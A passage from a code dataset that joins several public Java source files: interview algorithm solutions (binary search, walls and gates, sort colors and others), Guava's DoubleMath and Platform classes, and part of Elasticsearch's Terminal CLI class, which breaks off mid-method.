int right = n;
while(left <= right) {
int mid = left + (right - left) / 2;
if(guess(mid) == 0) {
return mid;
} else if(guess(mid) > 0) {
left = mid + 1;
} else {
right = mid;
}
}
return -1;
}
}
| kdn251/interviews | leetcode/binary-search/GuessNumberHigherOrLower.java |
1,181 | // You are given a m x n 2D grid initialized with these three possible values.
// -1 - A wall or an obstacle.
// 0 - A gate.
// INF - Infinity means an empty room. We use the value 231 - 1 = 2147483647 to represent INF as you may assume that the distance to a gate is less than 2147483647.
// Fill each empty room with the distance to its nearest gate. If it is impossible to reach a gate, it should be filled with INF.
// For example, given the 2D grid:
// INF -1 0 INF
// INF INF INF -1
// INF -1 INF -1
// 0 -1 INF INF
// After running your function, the 2D grid should be:
// 3 -1 0 1
// 2 2 1 -1
// 1 -1 2 -1
// 0 -1 3 4
public class WallsAndGates {
public void wallsAndGates(int[][] rooms) {
//iterate through the matrix calling dfs on all indices that contain a zero
for(int i = 0; i < rooms.length; i++) {
for(int j = 0; j < rooms[0].length; j++) {
if(rooms[i][j] == 0) {
dfs(rooms, i, j, 0);
}
}
}
}
void dfs(int[][] rooms, int i, int j, int distance) {
//if you have gone out of the bounds of the array or you have run into a wall/obstacle, return
// room[i][j] < distance also ensure that we do not overwrite any previously determined distance if it is shorter than our current distance
if(i < 0 || i >= rooms.length || j < 0 || j >= rooms[0].length || rooms[i][j] < distance) {
return;
}
//set current index's distance to distance
rooms[i][j] = distance;
//recurse on all adjacent neighbors of rooms[i][j]
dfs(rooms, i + 1, j, distance + 1);
dfs(rooms, i - 1, j, distance + 1);
dfs(rooms, i, j + 1, distance + 1);
dfs(rooms, i, j - 1, distance + 1);
}
}
| kdn251/interviews | company/facebook/WallsAndGates.java |
1,183 | /*
* Copyright (C) 2011 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package com.google.common.math;
import static com.google.common.base.Preconditions.checkArgument;
import static com.google.common.math.DoubleUtils.IMPLICIT_BIT;
import static com.google.common.math.DoubleUtils.SIGNIFICAND_BITS;
import static com.google.common.math.DoubleUtils.getSignificand;
import static com.google.common.math.DoubleUtils.isFinite;
import static com.google.common.math.DoubleUtils.isNormal;
import static com.google.common.math.DoubleUtils.scaleNormalize;
import static com.google.common.math.MathPreconditions.checkInRangeForRoundingInputs;
import static com.google.common.math.MathPreconditions.checkNonNegative;
import static com.google.common.math.MathPreconditions.checkRoundingUnnecessary;
import static java.lang.Math.abs;
import static java.lang.Math.copySign;
import static java.lang.Math.getExponent;
import static java.lang.Math.log;
import static java.lang.Math.rint;
import com.google.common.annotations.GwtCompatible;
import com.google.common.annotations.GwtIncompatible;
import com.google.common.annotations.VisibleForTesting;
import com.google.common.primitives.Booleans;
import com.google.errorprone.annotations.CanIgnoreReturnValue;
import java.math.BigInteger;
import java.math.RoundingMode;
import java.util.Iterator;
/**
* A class for arithmetic on doubles that is not covered by {@link java.lang.Math}.
*
* @author Louis Wasserman
* @since 11.0
*/
@GwtCompatible(emulated = true)
@ElementTypesAreNonnullByDefault
public final class DoubleMath {
/*
* This method returns a value y such that rounding y DOWN (towards zero) gives the same result as
* rounding x according to the specified mode.
*/
@GwtIncompatible // #isMathematicalInteger, com.google.common.math.DoubleUtils
static double roundIntermediate(double x, RoundingMode mode) {
if (!isFinite(x)) {
throw new ArithmeticException("input is infinite or NaN");
}
switch (mode) {
case UNNECESSARY:
checkRoundingUnnecessary(isMathematicalInteger(x));
return x;
case FLOOR:
if (x >= 0.0 || isMathematicalInteger(x)) {
return x;
} else {
return (long) x - 1;
}
case CEILING:
if (x <= 0.0 || isMathematicalInteger(x)) {
return x;
} else {
return (long) x + 1;
}
case DOWN:
return x;
case UP:
if (isMathematicalInteger(x)) {
return x;
} else {
return (long) x + (x > 0 ? 1 : -1);
}
case HALF_EVEN:
return rint(x);
case HALF_UP:
{
double z = rint(x);
if (abs(x - z) == 0.5) {
return x + copySign(0.5, x);
} else {
return z;
}
}
case HALF_DOWN:
{
double z = rint(x);
if (abs(x - z) == 0.5) {
return x;
} else {
return z;
}
}
default:
throw new AssertionError();
}
}
/**
* Returns the {@code int} value that is equal to {@code x} rounded with the specified rounding
* mode, if possible.
*
* @throws ArithmeticException if
* <ul>
* <li>{@code x} is infinite or NaN
* <li>{@code x}, after being rounded to a mathematical integer using the specified rounding
* mode, is either less than {@code Integer.MIN_VALUE} or greater than {@code
* Integer.MAX_VALUE}
* <li>{@code x} is not a mathematical integer and {@code mode} is {@link
* RoundingMode#UNNECESSARY}
* </ul>
*/
@GwtIncompatible // #roundIntermediate
public static int roundToInt(double x, RoundingMode mode) {
double z = roundIntermediate(x, mode);
checkInRangeForRoundingInputs(
z > MIN_INT_AS_DOUBLE - 1.0 & z < MAX_INT_AS_DOUBLE + 1.0, x, mode);
return (int) z;
}
private static final double MIN_INT_AS_DOUBLE = -0x1p31;
private static final double MAX_INT_AS_DOUBLE = 0x1p31 - 1.0;
/**
* Returns the {@code long} value that is equal to {@code x} rounded with the specified rounding
* mode, if possible.
*
* @throws ArithmeticException if
* <ul>
* <li>{@code x} is infinite or NaN
* <li>{@code x}, after being rounded to a mathematical integer using the specified rounding
* mode, is either less than {@code Long.MIN_VALUE} or greater than {@code
* Long.MAX_VALUE}
* <li>{@code x} is not a mathematical integer and {@code mode} is {@link
* RoundingMode#UNNECESSARY}
* </ul>
*/
@GwtIncompatible // #roundIntermediate
public static long roundToLong(double x, RoundingMode mode) {
double z = roundIntermediate(x, mode);
checkInRangeForRoundingInputs(
MIN_LONG_AS_DOUBLE - z < 1.0 & z < MAX_LONG_AS_DOUBLE_PLUS_ONE, x, mode);
return (long) z;
}
private static final double MIN_LONG_AS_DOUBLE = -0x1p63;
/*
* We cannot store Long.MAX_VALUE as a double without losing precision. Instead, we store
* Long.MAX_VALUE + 1 == -Long.MIN_VALUE, and then offset all comparisons by 1.
*/
private static final double MAX_LONG_AS_DOUBLE_PLUS_ONE = 0x1p63;
/**
* Returns the {@code BigInteger} value that is equal to {@code x} rounded with the specified
* rounding mode, if possible.
*
* @throws ArithmeticException if
* <ul>
* <li>{@code x} is infinite or NaN
* <li>{@code x} is not a mathematical integer and {@code mode} is {@link
* RoundingMode#UNNECESSARY}
* </ul>
*/
// #roundIntermediate, java.lang.Math.getExponent, com.google.common.math.DoubleUtils
@GwtIncompatible
public static BigInteger roundToBigInteger(double x, RoundingMode mode) {
x = roundIntermediate(x, mode);
if (MIN_LONG_AS_DOUBLE - x < 1.0 & x < MAX_LONG_AS_DOUBLE_PLUS_ONE) {
return BigInteger.valueOf((long) x);
}
int exponent = getExponent(x);
long significand = getSignificand(x);
BigInteger result = BigInteger.valueOf(significand).shiftLeft(exponent - SIGNIFICAND_BITS);
return (x < 0) ? result.negate() : result;
}
/**
* Returns {@code true} if {@code x} is exactly equal to {@code 2^k} for some finite integer
* {@code k}.
*/
@GwtIncompatible // com.google.common.math.DoubleUtils
public static boolean isPowerOfTwo(double x) {
if (x > 0.0 && isFinite(x)) {
long significand = getSignificand(x);
return (significand & (significand - 1)) == 0;
}
return false;
}
/**
* Returns the base 2 logarithm of a double value.
*
* <p>Special cases:
*
* <ul>
* <li>If {@code x} is NaN or less than zero, the result is NaN.
* <li>If {@code x} is positive infinity, the result is positive infinity.
* <li>If {@code x} is positive or negative zero, the result is negative infinity.
* </ul>
*
* <p>The computed result is within 1 ulp of the exact result.
*
* <p>If the result of this method will be immediately rounded to an {@code int}, {@link
* #log2(double, RoundingMode)} is faster.
*/
public static double log2(double x) {
return log(x) / LN_2; // surprisingly within 1 ulp according to tests
}
/**
* Returns the base 2 logarithm of a double value, rounded with the specified rounding mode to an
* {@code int}.
*
* <p>Regardless of the rounding mode, this is faster than {@code (int) log2(x)}.
*
* @throws IllegalArgumentException if {@code x <= 0.0}, {@code x} is NaN, or {@code x} is
* infinite
*/
@GwtIncompatible // java.lang.Math.getExponent, com.google.common.math.DoubleUtils
@SuppressWarnings("fallthrough")
public static int log2(double x, RoundingMode mode) {
checkArgument(x > 0.0 && isFinite(x), "x must be positive and finite");
int exponent = getExponent(x);
if (!isNormal(x)) {
return log2(x * IMPLICIT_BIT, mode) - SIGNIFICAND_BITS;
// Do the calculation on a normal value.
}
// x is positive, finite, and normal
boolean increment;
switch (mode) {
case UNNECESSARY:
checkRoundingUnnecessary(isPowerOfTwo(x));
// fall through
case FLOOR:
increment = false;
break;
case CEILING:
increment = !isPowerOfTwo(x);
break;
case DOWN:
increment = exponent < 0 & !isPowerOfTwo(x);
break;
case UP:
increment = exponent >= 0 & !isPowerOfTwo(x);
break;
case HALF_DOWN:
case HALF_EVEN:
case HALF_UP:
double xScaled = scaleNormalize(x);
// sqrt(2) is irrational, and the spec is relative to the "exact numerical result,"
// so log2(x) is never exactly exponent + 0.5.
increment = (xScaled * xScaled) > 2.0;
break;
default:
throw new AssertionError();
}
return increment ? exponent + 1 : exponent;
}
private static final double LN_2 = log(2);
/**
* Returns {@code true} if {@code x} represents a mathematical integer.
*
* <p>This is equivalent to, but not necessarily implemented as, the expression {@code
* !Double.isNaN(x) && !Double.isInfinite(x) && x == Math.rint(x)}.
*/
@GwtIncompatible // java.lang.Math.getExponent, com.google.common.math.DoubleUtils
public static boolean isMathematicalInteger(double x) {
return isFinite(x)
&& (x == 0.0
|| SIGNIFICAND_BITS - Long.numberOfTrailingZeros(getSignificand(x)) <= getExponent(x));
}
/**
* Returns {@code n!}, that is, the product of the first {@code n} positive integers, {@code 1} if
* {@code n == 0}, or {@code n!}, or {@link Double#POSITIVE_INFINITY} if {@code n! >
* Double.MAX_VALUE}.
*
* <p>The result is within 1 ulp of the true value.
*
* @throws IllegalArgumentException if {@code n < 0}
*/
public static double factorial(int n) {
checkNonNegative("n", n);
if (n > MAX_FACTORIAL) {
return Double.POSITIVE_INFINITY;
} else {
// Multiplying the last (n & 0xf) values into their own accumulator gives a more accurate
// result than multiplying by everySixteenthFactorial[n >> 4] directly.
double accum = 1.0;
for (int i = 1 + (n & ~0xf); i <= n; i++) {
accum *= i;
}
return accum * everySixteenthFactorial[n >> 4];
}
}
@VisibleForTesting static final int MAX_FACTORIAL = 170;
@VisibleForTesting
static final double[] everySixteenthFactorial = {
0x1.0p0,
0x1.30777758p44,
0x1.956ad0aae33a4p117,
0x1.ee69a78d72cb6p202,
0x1.fe478ee34844ap295,
0x1.c619094edabffp394,
0x1.3638dd7bd6347p498,
0x1.7cac197cfe503p605,
0x1.1e5dfc140e1e5p716,
0x1.8ce85fadb707ep829,
0x1.95d5f3d928edep945
};
/**
* Returns {@code true} if {@code a} and {@code b} are within {@code tolerance} of each other.
*
* <p>Technically speaking, this is equivalent to {@code Math.abs(a - b) <= tolerance ||
* Double.valueOf(a).equals(Double.valueOf(b))}.
*
* <p>Notable special cases include:
*
* <ul>
* <li>All NaNs are fuzzily equal.
* <li>If {@code a == b}, then {@code a} and {@code b} are always fuzzily equal.
* <li>Positive and negative zero are always fuzzily equal.
* <li>If {@code tolerance} is zero, and neither {@code a} nor {@code b} is NaN, then {@code a}
* and {@code b} are fuzzily equal if and only if {@code a == b}.
* <li>With {@link Double#POSITIVE_INFINITY} tolerance, all non-NaN values are fuzzily equal.
* <li>With finite tolerance, {@code Double.POSITIVE_INFINITY} and {@code
* Double.NEGATIVE_INFINITY} are fuzzily equal only to themselves.
* </ul>
*
* <p>This is reflexive and symmetric, but <em>not</em> transitive, so it is <em>not</em> an
* equivalence relation and <em>not</em> suitable for use in {@link Object#equals}
* implementations.
*
* @throws IllegalArgumentException if {@code tolerance} is {@code < 0} or NaN
* @since 13.0
*/
public static boolean fuzzyEquals(double a, double b, double tolerance) {
MathPreconditions.checkNonNegative("tolerance", tolerance);
return Math.copySign(a - b, 1.0) <= tolerance
// copySign(x, 1.0) is a branch-free version of abs(x), but with different NaN semantics
|| (a == b) // needed to ensure that infinities equal themselves
|| (Double.isNaN(a) && Double.isNaN(b));
}
/**
* Compares {@code a} and {@code b} "fuzzily," with a tolerance for nearly-equal values.
*
* <p>This method is equivalent to {@code fuzzyEquals(a, b, tolerance) ? 0 : Double.compare(a,
* b)}. In particular, like {@link Double#compare(double, double)}, it treats all NaN values as
* equal and greater than all other values (including {@link Double#POSITIVE_INFINITY}).
*
* <p>This is <em>not</em> a total ordering and is <em>not</em> suitable for use in {@link
* Comparable#compareTo} implementations. In particular, it is not transitive.
*
* @throws IllegalArgumentException if {@code tolerance} is {@code < 0} or NaN
* @since 13.0
*/
public static int fuzzyCompare(double a, double b, double tolerance) {
if (fuzzyEquals(a, b, tolerance)) {
return 0;
} else if (a < b) {
return -1;
} else if (a > b) {
return 1;
} else {
return Booleans.compare(Double.isNaN(a), Double.isNaN(b));
}
}
/**
* Returns the <a href="http://en.wikipedia.org/wiki/Arithmetic_mean">arithmetic mean</a> of
* {@code values}.
*
* <p>If these values are a sample drawn from a population, this is also an unbiased estimator of
* the arithmetic mean of the population.
*
* @param values a nonempty series of values
* @throws IllegalArgumentException if {@code values} is empty or contains any non-finite value
* @deprecated Use {@link Stats#meanOf} instead, noting the less strict handling of non-finite
* values.
*/
@Deprecated
// com.google.common.math.DoubleUtils
@GwtIncompatible
public static double mean(double... values) {
checkArgument(values.length > 0, "Cannot take mean of 0 values");
long count = 1;
double mean = checkFinite(values[0]);
for (int index = 1; index < values.length; ++index) {
checkFinite(values[index]);
count++;
// Art of Computer Programming vol. 2, Knuth, 4.2.2, (15)
mean += (values[index] - mean) / count;
}
return mean;
}
/**
* Returns the <a href="http://en.wikipedia.org/wiki/Arithmetic_mean">arithmetic mean</a> of
* {@code values}.
*
* <p>If these values are a sample drawn from a population, this is also an unbiased estimator of
* the arithmetic mean of the population.
*
* @param values a nonempty series of values
* @throws IllegalArgumentException if {@code values} is empty
* @deprecated Use {@link Stats#meanOf} instead, noting the less strict handling of non-finite
* values.
*/
@Deprecated
public static double mean(int... values) {
checkArgument(values.length > 0, "Cannot take mean of 0 values");
// The upper bound on the length of an array and the bounds on the int values mean that, in
// this case only, we can compute the sum as a long without risking overflow or loss of
// precision. So we do that, as it's slightly quicker than the Knuth algorithm.
long sum = 0;
for (int index = 0; index < values.length; ++index) {
sum += values[index];
}
return (double) sum / values.length;
}
/**
* Returns the <a href="http://en.wikipedia.org/wiki/Arithmetic_mean">arithmetic mean</a> of
* {@code values}.
*
* <p>If these values are a sample drawn from a population, this is also an unbiased estimator of
* the arithmetic mean of the population.
*
* @param values a nonempty series of values, which will be converted to {@code double} values
* (this may cause loss of precision for longs of magnitude over 2^53 (slightly over 9e15))
* @throws IllegalArgumentException if {@code values} is empty
* @deprecated Use {@link Stats#meanOf} instead, noting the less strict handling of non-finite
* values.
*/
@Deprecated
public static double mean(long... values) {
checkArgument(values.length > 0, "Cannot take mean of 0 values");
long count = 1;
double mean = values[0];
for (int index = 1; index < values.length; ++index) {
count++;
// Art of Computer Programming vol. 2, Knuth, 4.2.2, (15)
mean += (values[index] - mean) / count;
}
return mean;
}
/**
* Returns the <a href="http://en.wikipedia.org/wiki/Arithmetic_mean">arithmetic mean</a> of
* {@code values}.
*
* <p>If these values are a sample drawn from a population, this is also an unbiased estimator of
* the arithmetic mean of the population.
*
* @param values a nonempty series of values, which will be converted to {@code double} values
* (this may cause loss of precision)
* @throws IllegalArgumentException if {@code values} is empty or contains any non-finite value
* @deprecated Use {@link Stats#meanOf} instead, noting the less strict handling of non-finite
* values.
*/
@Deprecated
// com.google.common.math.DoubleUtils
@GwtIncompatible
public static double mean(Iterable<? extends Number> values) {
return mean(values.iterator());
}
/**
* Returns the <a href="http://en.wikipedia.org/wiki/Arithmetic_mean">arithmetic mean</a> of
* {@code values}.
*
* <p>If these values are a sample drawn from a population, this is also an unbiased estimator of
* the arithmetic mean of the population.
*
* @param values a nonempty series of values, which will be converted to {@code double} values
* (this may cause loss of precision)
* @throws IllegalArgumentException if {@code values} is empty or contains any non-finite value
* @deprecated Use {@link Stats#meanOf} instead, noting the less strict handling of non-finite
* values.
*/
@Deprecated
// com.google.common.math.DoubleUtils
@GwtIncompatible
public static double mean(Iterator<? extends Number> values) {
checkArgument(values.hasNext(), "Cannot take mean of 0 values");
long count = 1;
double mean = checkFinite(values.next().doubleValue());
while (values.hasNext()) {
double value = checkFinite(values.next().doubleValue());
count++;
// Art of Computer Programming vol. 2, Knuth, 4.2.2, (15)
mean += (value - mean) / count;
}
return mean;
}
@GwtIncompatible // com.google.common.math.DoubleUtils
@CanIgnoreReturnValue
private static double checkFinite(double argument) {
checkArgument(isFinite(argument));
return argument;
}
private DoubleMath() {}
}
| google/guava | guava/src/com/google/common/math/DoubleMath.java |
1,185 | /*
* Copyright (C) 2008 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.common.collect;
import com.google.common.annotations.GwtCompatible;
import com.google.common.annotations.J2ktIncompatible;
import java.util.Arrays;
import java.util.Map;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;
import org.checkerframework.checker.nullness.qual.Nullable;
/**
* Methods factored out so that they can be emulated differently in GWT.
*
* @author Hayward Chan
*/
@GwtCompatible(emulated = true)
@ElementTypesAreNonnullByDefault
final class Platform {
/** Returns the platform preferred implementation of a map based on a hash table. */
static <K extends @Nullable Object, V extends @Nullable Object>
Map<K, V> newHashMapWithExpectedSize(int expectedSize) {
return Maps.newHashMapWithExpectedSize(expectedSize);
}
/**
* Returns the platform preferred implementation of an insertion ordered map based on a hash
* table.
*/
static <K extends @Nullable Object, V extends @Nullable Object>
Map<K, V> newLinkedHashMapWithExpectedSize(int expectedSize) {
return Maps.newLinkedHashMapWithExpectedSize(expectedSize);
}
/** Returns the platform preferred implementation of a set based on a hash table. */
static <E extends @Nullable Object> Set<E> newHashSetWithExpectedSize(int expectedSize) {
return Sets.newHashSetWithExpectedSize(expectedSize);
}
/** Returns the platform preferred implementation of a thread-safe hash set. */
static <E> Set<E> newConcurrentHashSet() {
return ConcurrentHashMap.newKeySet();
}
/**
* Returns the platform preferred implementation of an insertion ordered set based on a hash
* table.
*/
static <E extends @Nullable Object> Set<E> newLinkedHashSetWithExpectedSize(int expectedSize) {
return Sets.newLinkedHashSetWithExpectedSize(expectedSize);
}
/**
* Returns the platform preferred map implementation that preserves insertion order when used only
* for insertions.
*/
static <K extends @Nullable Object, V extends @Nullable Object>
Map<K, V> preservesInsertionOrderOnPutsMap() {
return Maps.newLinkedHashMap();
}
/**
* Returns the platform preferred set implementation that preserves insertion order when used only
* for insertions.
*/
static <E extends @Nullable Object> Set<E> preservesInsertionOrderOnAddsSet() {
return CompactHashSet.create();
}
/**
* Returns a new array of the given length with the same type as a reference array.
*
* @param reference any array of the desired type
* @param length the length of the new array
*/
/*
* The new array contains nulls, even if the old array did not. If we wanted to be accurate, we
* would declare a return type of `@Nullable T[]`. However, we've decided not to think too hard
* about arrays for now, as they're a mess. (We previously discussed this in the review of
* ObjectArrays, which is the main caller of this method.)
*/
static <T extends @Nullable Object> T[] newArray(T[] reference, int length) {
T[] empty = reference.length == 0 ? reference : Arrays.copyOf(reference, 0);
return Arrays.copyOf(empty, length);
}
/** Equivalent to Arrays.copyOfRange(source, from, to, arrayOfType.getClass()). */
/*
* Arrays are a mess from a nullness perspective, and Class instances for object-array types are
* even worse. For now, we just suppress and move on with our lives.
*
* - https://github.com/jspecify/jspecify/issues/65
*
* - https://github.com/jspecify/jdk/commit/71d826792b8c7ef95d492c50a274deab938f2552
*/
/*
* TODO(cpovirk): Is the unchecked cast avoidable? Would System.arraycopy be similarly fast (if
* likewise not type-checked)? Could our single caller do something different?
*/
@SuppressWarnings({"nullness", "unchecked"})
static <T extends @Nullable Object> T[] copy(Object[] source, int from, int to, T[] arrayOfType) {
return Arrays.copyOfRange(source, from, to, (Class<? extends T[]>) arrayOfType.getClass());
}
/**
* Configures the given map maker to use weak keys, if possible; does nothing otherwise (i.e., in
* GWT). This is sometimes acceptable, when only server-side code could generate enough volume
* that reclamation becomes important.
*/
@J2ktIncompatible
static MapMaker tryWeakKeys(MapMaker mapMaker) {
return mapMaker.weakKeys();
}
static <E extends Enum<E>> Class<E> getDeclaringClassOrObjectForJ2cl(E e) {
return e.getDeclaringClass();
}
static int reduceIterationsIfGwt(int iterations) {
return iterations;
}
static int reduceExponentIfGwt(int exponent) {
return exponent;
}
private Platform() {}
}
| google/guava | guava/src/com/google/common/collect/Platform.java |
1,186 | // Given a string, we can "shift" each of its letter to its successive letter, for example: "abc" -> "bcd". We can keep "shifting" which forms the sequence:
// "abc" -> "bcd" -> ... -> "xyz"
// Given a list of strings which contains only lowercase alphabets, group all strings that belong to the same shifting sequence.
// For example, given: ["abc", "bcd", "acef", "xyz", "az", "ba", "a", "z"],
// A solution is:
// [
// ["abc","bcd","xyz"],
// ["az","ba"],
// ["acef"],
// ["a","z"]
// ]
public class GroupShiftedStrings {
public List<List<String>> groupStrings(String[] strings) {
List<List<String>> result = new ArrayList<List<String>>();
HashMap<String, List<String>> map = new HashMap<String, List<String>>();
for(String s : strings) {
int offset = s.charAt(0) - 'a';
String key = "";
for(int i = 0; i < s.length(); i++) {
char current = (char)(s.charAt(i) - offset);
if(current < 'a') {
current += 26;
}
key += current;
}
if(!map.containsKey(key)) {
List<String> list = new ArrayList<String>();
map.put(key, list);
}
map.get(key).add(s);
}
for(String key : map.keySet()) {
List<String> list = map.get(key);
Collections.sort(list);
result.add(list);
}
return result;
}
}
| kdn251/interviews | company/uber/GroupShiftedStrings.java |
1,187 | // Given an array with n objects colored red, white or blue, sort them so that objects of the same color are adjacent, with the colors in the order red, white and blue.
// Here, we will use the integers 0, 1, and 2 to represent the color red, white, and blue respectively.
// Note:
// You are not suppose to use the library's sort function for this problem.
public class SortColors {
public void sortColors(int[] nums) {
int wall = 0;
for(int i = 0; i < nums.length; i++) {
if(nums[i] < 1) {
int temp = nums[i];
nums[i] = nums[wall];
nums[wall] = temp;
wall++;
}
}
for(int i = 0; i < nums.length; i++) {
if(nums[i] == 1) {
int temp = nums[i];
nums[i] = nums[wall];
nums[wall] = temp;
wall++;
}
}
}
}
| kdn251/interviews | leetcode/two-pointers/SortColors.java |
1,188 | // Given an integer array with all positive numbers and no duplicates, find the number of possible combinations that add up to a positive integer target.
// Example:
// nums = [1, 2, 3]
// target = 4
// The possible combination ways are:
// (1, 1, 1, 1)
// (1, 1, 2)
// (1, 2, 1)
// (1, 3)
// (2, 1, 1)
// (2, 2)
// (3, 1)
// Note that different sequences are counted as different combinations.
// Therefore the output is 7.
// Follow up:
// What if negative numbers are allowed in the given array?
// How does it change the problem?
// What limitation we need to add to the question to allow negative numbers?
public class Solution {
public int combinationSum4(int[] nums, int target) {
int[] dp = new int[target + 1];
dp[0] = 1;
for(int i = 1; i < dp.length; i++) {
for(int j = 0; j < nums.length; j++) {
if(i - nums[j] >= 0) {
dp[i] += dp[i - nums[j]];
}
}
}
return dp[target];
}
} | kdn251/interviews | company/facebook/CombinationSumIV.java |
1,189 | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
package org.elasticsearch.cli;
import org.elasticsearch.core.Nullable;
import org.elasticsearch.core.SuppressForbidden;
import java.io.Console;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.io.PrintWriter;
import java.io.Reader;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.nio.charset.Charset;
import java.util.Arrays;
import java.util.Locale;
/**
* A Terminal wraps access to reading input and writing output for a cli.
*
* The available methods are similar to those of {@link Console}, with the ability
* to read either normal text or a password, and the ability to print a line
* of text. Printing is also gated by the {@link Verbosity} of the terminal,
* which allows {@link #println(Verbosity,CharSequence)} calls which act like a logger,
* only actually printing if the verbosity level of the terminal is above
* the verbosity of the message.
*/
public abstract class Terminal {
// Writer to standard error - not supplied by the {@link Console} API, so we share with subclasses
private static final PrintWriter ERROR_WRITER = newErrorWriter();
/** The default terminal implementation, which will be a console if available, or stdout/stderr if not. */
public static final Terminal DEFAULT = ConsoleTerminal.isSupported() ? new ConsoleTerminal() : new SystemTerminal();
@SuppressForbidden(reason = "Writer for System.err")
private static PrintWriter newErrorWriter() {
return new PrintWriter(System.err, true);
}
/** Defines the available verbosity levels of messages to be printed. */
public enum Verbosity {
SILENT, /* always printed */
NORMAL, /* printed when no options are given to cli */
VERBOSE /* printed only when cli is passed verbose option */
}
private final Reader reader;
private final PrintWriter outWriter;
private final PrintWriter errWriter;
private Verbosity currentVerbosity = Verbosity.NORMAL;
/**
* Constructs a terminal instance.
*
* @param reader A character-based reader over the input of this terminal
* @param outWriter A character-based writer for the output of this terminal
* @param errWriter A character-based writer for the error stream of this terminal
*/
protected Terminal(Reader reader, PrintWriter outWriter, PrintWriter errWriter) {
this.reader = reader;
this.outWriter = outWriter;
this.errWriter = errWriter;
}
/**
* Constructs a terminal instance from a delegate instance.
*/
protected Terminal(Terminal delegate) {
this(delegate.reader, delegate.outWriter, delegate.errWriter);
}
/**
* Sets the verbosity of the terminal.
*
* <p> Defaults to {@link Verbosity#NORMAL}.
*/
public void setVerbosity(Verbosity verbosity) {
this.currentVerbosity = verbosity;
}
/**
* Return the current verbosity level of this terminal.
*/
public Verbosity getVerbosity() {
return currentVerbosity;
}
private char[] read(String prompt) {
errWriter.print(prompt); // prompts should go to standard error to avoid mixing with list output
errWriter.flush(); // flush to ensure it is seen
final char[] line = readLineToCharArray(reader);
if (line == null) {
throw new IllegalStateException("unable to read from standard input; is standard input open and a tty attached?");
}
return line;
}
/** Reads clear text from the terminal input. See {@link Console#readLine()}. */
public String readText(String prompt) {
return new String(read(prompt));
}
/** Reads password text from the terminal input. See {@link Console#readPassword()}}. */
public char[] readSecret(String prompt) {
return read(prompt);
}
/** Returns a Reader which can be used to read directly from the terminal using standard input. */
public final Reader getReader() {
return reader;
}
/**
* Returns a line based OutputStream wrapping this Terminal's println.
* Note, this OutputStream is not thread-safe!
*/
public final OutputStream asLineOutputStream(Charset charset) {
return new LineOutputStream(charset);
}
/**
* Returns an InputStream which can be used to read from the terminal directly using standard input.
*
* <p> May return {@code null} if this Terminal is not capable of binary input.
* This corresponds with the underlying stream of bytes read by {@link #reader}.
*/
@Nullable
public InputStream getInputStream() {
return null;
}
/**
* Returns an OutputStream which can be used to write to the terminal directly using standard output.
*
* <p> May return {@code null} if this Terminal is not capable of binary output.
* This corresponds with the underlying stream of bytes written to by {@link #println(CharSequence)}.
*/
@Nullable
public OutputStream getOutputStream() {
return null;
}
/** Prints a line to the terminal at {@link Verbosity#NORMAL} verbosity level. */
public final void println(CharSequence msg) {
println(Verbosity.NORMAL, msg);
}
/** Prints a line to the terminal at {@code verbosity} level. */
public final void println(Verbosity verbosity, CharSequence msg) {
print(verbosity, outWriter, msg, true, true);
}
/** Prints message to the terminal's standard output at {@code verbosity} level, without a newline. */
public final void print(Verbosity verbosity, String msg) {
print(verbosity, outWriter, msg, false, true);
}
/**
* Prints message to the terminal at {@code verbosity} level.
*
* Subclasses may override if the writers are not implemented.
*/
protected void print(Verbosity verbosity, PrintWriter writer, CharSequence msg, boolean newline, boolean flush) {
if (isPrintable(verbosity)) {
if (newline) {
writer.println(msg);
} else {
writer.print(msg);
}
if (flush) {
writer.flush();
}
}
}
/** Prints a line to the terminal's standard error at {@link Verbosity#NORMAL} verbosity level, without a newline. */
public final void errorPrint(Verbosity verbosity, String msg) {
print(verbosity, errWriter, msg, false, true);
}
/** Prints a line to the terminal's standard error at {@link Verbosity#NORMAL} verbosity level. */
public final void errorPrintln(String msg) {
print(Verbosity.NORMAL, errWriter, msg, true, true);
}
/** Prints a line to the terminal's standard error at {@code verbosity} level. */
public final void errorPrintln(Verbosity verbosity, String msg) {
print(verbosity, errWriter, msg, true, true);
}
/** Prints a line to the terminal's standard error at {@code verbosity} level, with an optional flush */
public final void errorPrintln(Verbosity verbosity, String msg, boolean flush) {
print(verbosity, errWriter, msg, true, flush);
}
/** Prints a stacktrace to the terminal's standard error at {@code verbosity} level. */
public void errorPrintln(Verbosity verbosity, Throwable throwable) {
if (isPrintable(verbosity)) {
throwable.printStackTrace(errWriter);
}
}
/** Prints a stacktrace to the terminal's standard error at {@link Verbosity#SILENT} verbosity level. */
public void errorPrintln(Throwable throwable) {
errorPrintln(Verbosity.SILENT, throwable);
}
/** Checks if is enough {@code verbosity} level to be printed */
public final boolean isPrintable(Verbosity verbosity) {
return this.currentVerbosity.ordinal() >= verbosity.ordinal();
}
/**
* Prompt for a yes or no answer from the user. This method will loop until 'y' or 'n'
* (or the default empty value) is entered.
*/
public final boolean promptYesNo(String prompt, boolean defaultYes) {
String answerPrompt = defaultYes ? " [Y/n]" : " [y/N]";
while (true) {
String answer = readText(prompt + answerPrompt);
if (answer == null || answer.isEmpty()) {
return defaultYes;
}
answer = answer.toLowerCase(Locale.ROOT);
boolean answerYes = answer.equals("y");
if (answerYes == false && answer.equals("n") == false) {
errorPrintln("Did not understand answer '" + answer + "'");
continue;
